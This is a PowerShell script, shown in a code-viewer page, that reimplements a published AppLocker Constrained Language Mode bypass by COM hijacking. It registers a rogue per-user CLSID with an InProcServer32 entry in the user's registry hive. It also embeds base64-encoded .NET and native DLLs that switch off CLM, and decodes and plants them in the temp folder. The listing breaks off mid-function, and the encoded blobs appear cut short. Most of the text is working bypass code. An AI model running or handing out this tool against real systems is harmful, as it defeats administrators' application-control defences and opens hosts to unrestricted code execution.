225 lines
293 KiB
PowerShell
225 lines
293 KiB
PowerShell
|
# -------------------------
|
||
|
|
$comName = "ClmDisableDll"
|
||
|
|
$comDescription = "CLM Disable COM"
|
||
|
|
|
||
|
|
$dstDllPath = "$($Env:Temp)\ClmDisableDll.dll"
|
||
|
|
$dstAssemblyPath = "$($Env:Temp)\ClmDisableAssembly.dll"
|
||
|
|
|
||
|
|
$guid = "{394aaa50-684e-4870-911a-d045293b3b13}"
|
||
|
|
|
||
|
|
# -------------------------
|
||
|
|
|
||
|
|
function Bypass-CLM
|
||
|
|
{
|
||
|
|
param(
|
||
|
|
[switch]$RemoveComWhenFinished
|
||
|
|
)
|
||
|
|
|
||
|
|
$ErrorActionPreference = "SilentlyContinue"
|
||
|
|
|
||
|
|
function Create-COM {
|
||
|
|
param(
|
||
|
|
[Parameter(Mandatory = $true)]
|
||
|
|
[string]$comName,
|
||
|
|
|
||
|
|
[Parameter(Mandatory = $true)]
|
||
|
|
[string]$comDescription,
|
||
|
|
|
||
|
|
[Parameter(Mandatory = $true)]
|
||
|
|
[string]$dllPath,
|
||
|
|
|
||
|
|
[Parameter(Mandatory = $true)]
|
||
|
|
[string]$guid
|
||
|
|
)
|
||
|
|
|
||
|
|
# Obtains current user SID, can't use System.Security.Principal.NTAccount
|
||
|
|
# type because we are in Constrained Language Mode
|
||
|
|
$sid = (whoami /user | select-string -Pattern "(S-1-5[0-9-]+)" -all | select -ExpandProperty Matches).value
|
||
|
|
|
||
|
|
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
|
||
|
|
$key = 'HKU:\{0}_classes' -f $sid
|
||
|
|
|
||
|
|
# Adding our own InProcServer32
|
||
|
|
$key = 'HKU:\{0}_classes\CLSID\' -f $sid
|
||
|
|
New-Item -Path $key -Name $guid
|
||
|
|
$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, $guid
|
||
|
|
New-Item -Path $key -Name 'InProcServer32'
|
||
|
|
New-ItemProperty -Path $key -Name '(Default)' -Value $comDescription -PropertyType String -Force
|
||
|
|
$key = 'HKU:\{0}_classes\CLSID\{1}\InProcServer32' -f $sid, $guid
|
||
|
|
New-ItemProperty -Path $key -Name '(Default)' -Value $dllPath -PropertyType String -Force
|
||
|
|
New-ItemProperty -Path $key -Name 'ThreadingModel' -Value "Apartment" -PropertyType String -Force
|
||
|
|
|
||
|
|
# Registering COM's ProgID / shortname
|
||
|
|
$key = 'HKU:\{0}_classes' -f $sid
|
||
|
|
New-Item -Path $key -Name $comName
|
||
|
|
$key = 'HKU:\{0}_classes\{1}' -f $sid, $comName
|
||
|
|
New-ItemProperty -Path $key -Name '(Default)' -Value $comDescription -PropertyType String -Force
|
||
|
|
New-Item -Path $key -Name 'CLSID'
|
||
|
|
$key = 'HKU:\{0}_classes\{1}\CLSID' -f $sid, $comName
|
||
|
|
New-ItemProperty -Path $key -Name '(Default)' -Value $guid -PropertyType String -Force
|
||
|
|
}
|
||
|
|
|
||
|
|
function Remove-COM {
|
||
|
|
param(
|
||
|
|
[Parameter(Mandatory = $true)]
|
||
|
|
[string]$comName,
|
||
|
|
|
||
|
|
[Parameter(Mandatory = $true)]
|
||
|
|
[string]$guid
|
||
|
|
)
|
||
|
|
|
||
|
|
$sid = (whoami /user | select-string -Pattern "(S-1-5[0-9-]+)" -all | select -ExpandProperty Matches).value
|
||
|
|
|
||
|
|
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS | Out-Null
|
||
|
|
$key = 'HKU:\{0}_classes\{1}' -f $sid, $comName
|
||
|
|
Remove-Item -Path $key -Recurse | Out-Null
|
||
|
|
|
||
|
|
$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, $guid
|
||
|
|
Remove-Item -Path $key -Recurse | Out-Null
|
||
|
|
}
|
||
|
|
|
||
|
|
function Invoke-PS {
|
||
|
|
param(
|
||
|
|
[Parameter(Mandatory = $true)]
|
||
|
|
[string]$Commands
|
||
|
|
)
|
||
|
|
|
||
|
|
$Runspace = [runspacefactory]::CreateRunspace()
|
||
|
|
$posh = [powershell]::Create()
|
||
|
|
$posh.runspace = $Runspace
|
||
|
|
$Runspace.Open()
|
||
|
|
|
||
|
|
[void]$posh.AddScript($Commands)
|
||
|
|
$posh.Invoke()
|
||
|
|
$posh.Dispose() | Out-Null
|
||
|
|
}
|
||
|
|
|
||
|
|
function Decode-Base64 ($data) {
|
||
|
|
$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
|
||
|
|
$ss = "[^" + $chars + "=]"
|
||
|
|
$data = $data -replace $ss, ""
|
||
|
|
|
||
|
|
$pad = ""
|
||
|
|
[byte[]]$r = @()
|
||
|
|
if (($data[$data.Length - 1]) -eq '=') {
|
||
|
|
if (($data[$data.Length - 2]) -eq '=') {
|
||
|
|
$pad = "AA"
|
||
|
|
} else {
|
||
|
|
$pad = "A"
|
||
|
|
}
|
||
|
|
}
|
||
|
|
|
||
|
|
$data = $data.Substring(0, $data.Length - $pad.Length) + $pad
|
||
|
|
|
||
|
|
for($c = 0; $c -lt $data.Length ; $c += 4) {
|
||
|
|
$n = ($chars.IndexOf($data[$c]) -shl 18) `
|
||
|
|
+ ($chars.IndexOf($data[$c + 1]) -shl 12) `
|
||
|
|
+ ($chars.IndexOf($data[$c + 2]) -shl 6) `
|
||
|
|
+ ($chars.IndexOf($data[$c + 3]))
|
||
|
|
|
||
|
|
$r += [byte](($n -shr 16) -band 0xff)
|
||
|
|
$r += [byte](($n -shr 8) -band 0xff)
|
||
|
|
$r += [byte]($n -band 0xff)
|
||
|
|
}
|
||
|
|
|
||
|
|
$dif = $r.Length - $pad.Length
|
||
|
|
return $r[0..$dif]
|
||
|
|
}
|
||
|
|
|
||
|
|
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
|
||
|
|
Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
|
||
|
|
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
|
||
|
|
Write-Host "`n`tRe-implemented by: Mariusz B., mgeeky"
|
||
|
|
Write-Host "`t-----`n"
|
||
|
|
|
||
|
|
$EncodedAssemblyDll = "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bGU+AG1zY29ybGliAGdldF9NYW5hZ2VkVGhyZWFkSWQAR2V0Q3VycmVudFRocmVhZElkAGdldF9DdXJyZW50VGhyZWFkAENyZWF0ZVJ1bnNwYWNlAGdldF9EZWZhdWx0UnVuc3BhY2UAUFNMYW5ndWFnZU1vZGUAc2V0X0xhbmd1YWdlTW9kZQBJRGlzcG9zYWJsZQBDb25zb2xlAFdyaXRlTGluZQBDbG9zZQBEaXNwb3NlAGdldF9Jbml0aWFsU2Vzc2lvblN0YXRlAHNldF9BcGFydG1lbnRTdGF0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uVGhyZWFkaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9TdHJpbmcAYXJnAGdldF9MZW5ndGgAa2VybmVsMzIuZGxsAENsbURpc2FibGVBc3NlbWJseS5kbGwAU3lzdGVtAE9wZW4AU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24ALmN0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAFBTVGhyZWFkT3B0aW9ucwBzZXRfVGhyZWFkT3B0aW9ucwBDb25jYXQAT2JqZWN0AENyZWF0ZURlZmF1bHQAU3RhcnQAQ2xtRGlzYWJsZUFzc2VtYmx5AFJ1bnNwYWNlRmFjdG9yeQBnZXRfU2Vzc2lvblN0YXRlUHJveHkAAGVbACsAXQAgAE0AYQBuAGEAZwBlAGQAIABtAG8AZABlACAAYQBzAHMAZQBtAGIAbAB5AC4AIABEAGkAcwBhAGIAbABpAG4AZwAgAEMATABNACAAZwBsAG8AYgBhAGwAbAB5AC4AAFEJAEMAdQByAHIAZQBuAHQAIAB0AGgAcgBlAGEAZAAgAEkARAAgACgAbQBhAG4AYQBnAGUAZAAvAHUAbgBtAGEAbgBhAGcAZQBkACkAOgAgAAAHIAAvACAAACcJAFAAYQBzAHMAZQBkACAAYQByAGcAdQBtAGUAbgB0ADoAIAAn
|
||
|
|
|
||
|
|
# ##############################################
|
||
|
|
|
||
|
|
$EncodeDisableDll64 = "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
|
||
|
|
|
||
|
|
# ##############################################
|
||
|
|
|
||
|
|
$EncodeDisableDll86 = "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
|
||
|
|
|
||
|
|
|
||
|
|
# ##############################################
|
||
|
|
|
||
|
|
|
||
|
|
Write-Host "[.] Step 0. Decoding and planting DLL files in:"
|
||
|
|
|
||
|
|
if (!(Test-Path $dstAssemblyPath) -or ((Get-Item $dstAssemblyPath).length -eq 0) ) {
|
